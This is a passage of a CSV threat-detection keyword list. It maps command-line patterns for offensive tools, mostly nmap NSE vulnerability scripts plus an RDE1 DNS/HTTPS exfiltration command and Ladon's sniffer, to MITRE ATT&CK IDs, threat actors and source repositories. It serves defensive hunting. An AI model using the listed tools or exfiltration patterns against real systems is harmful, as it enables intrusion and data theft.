tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"* http-litespeed-sourcecode-download.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* http-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-majordomo2-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-malware-host.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-mcmp.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-method-tamper.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-mobileversion-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-nikto-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"* http-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-open-redirect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-passwd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-phpmyadmin-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-phpself-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-php-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-proxy-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-put.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-put-server.py*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* http-qnap-nas-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-referer-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-rfi-spider.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-robots.txt.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-robtex-reverse-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-robtex-shared-ns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* https://www.sendspace.com/file/*","greyware_tool_keyword","sendspace.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-sap-netweaver-leak.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-security-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-server-header.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-shellshock.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-sitemap-generator.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-slowloris.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-slowloris-check.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* HTTPSniffer *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* http-spider-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* http-sql-injection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* https-redirect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-stored-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-svn-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-svn-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-tenda-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"* http-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-tplink-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-trace.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-traceroute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-trane-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-unsafe-output-escaping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-useragent-tester.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-userdir-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vhosts.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-virustotal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vlcstreamer-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vmware-path-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2006-3392.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2009-3960.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2010-0738.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2010-2861.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2011-3192.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2011-3368.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2012-1823.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2013-0156.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2013-6786.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2013-7091.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* http-vuln-cve2014-2126.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - 